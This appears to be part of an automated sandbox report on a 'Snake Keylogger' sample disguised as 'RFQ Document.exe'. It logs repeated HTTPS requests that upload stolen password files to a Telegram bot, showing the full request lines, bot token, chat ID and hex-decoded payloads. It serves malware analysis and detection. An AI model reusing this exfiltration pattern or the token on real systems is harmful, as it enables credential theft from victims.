                                            Data Ascii: {"ok":true,"result":{"message_id":12639,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            58192.168.2.449834149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:34 UTC92OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ca37e243
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:34 UTC93OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 33 37 65 32 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ca37e243Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:34 UTC93INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:34 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:34 UTC93INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12640,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            59192.168.2.449835149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:34 UTC94OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ca4fb70b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:34 UTC94OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 34 66 62 37 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ca4fb70bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC95INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC95INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 34 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12641,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808714,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            6192.168.2.449780149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:21 UTC9OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c288eef3
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:21 UTC9OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 38 38 65 65 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c288eef3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:21 UTC10INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:21 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:21 UTC10INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 31 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12585,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808701,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            60192.168.2.449836149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:35 UTC95OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ca6eb568
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:35 UTC96OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 36 65 62 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ca6eb568Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC96INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC97INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12642,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            61192.168.2.449837149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:35 UTC97OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255ca8b52f6
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:35 UTC97OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 38 62 35 32 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255ca8b52f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC98INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC98INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12643,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            62192.168.2.449838149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:35 UTC99OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255caa329fb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:35 UTC99OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 61 33 32 39 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255caa329fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC99INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC100INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12644,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            63192.168.2.449839149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:35 UTC100OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cac2278a
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:35 UTC101OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 61 63 32 32 37 38 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255cac2278aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:35 UTC101INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:35 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:35 UTC101INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 35 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12645,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808715,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            64192.168.2.449840149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:35 UTC102OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255cae1260c
                                            Host: api.telegram.org
                                            Content-Length: 407
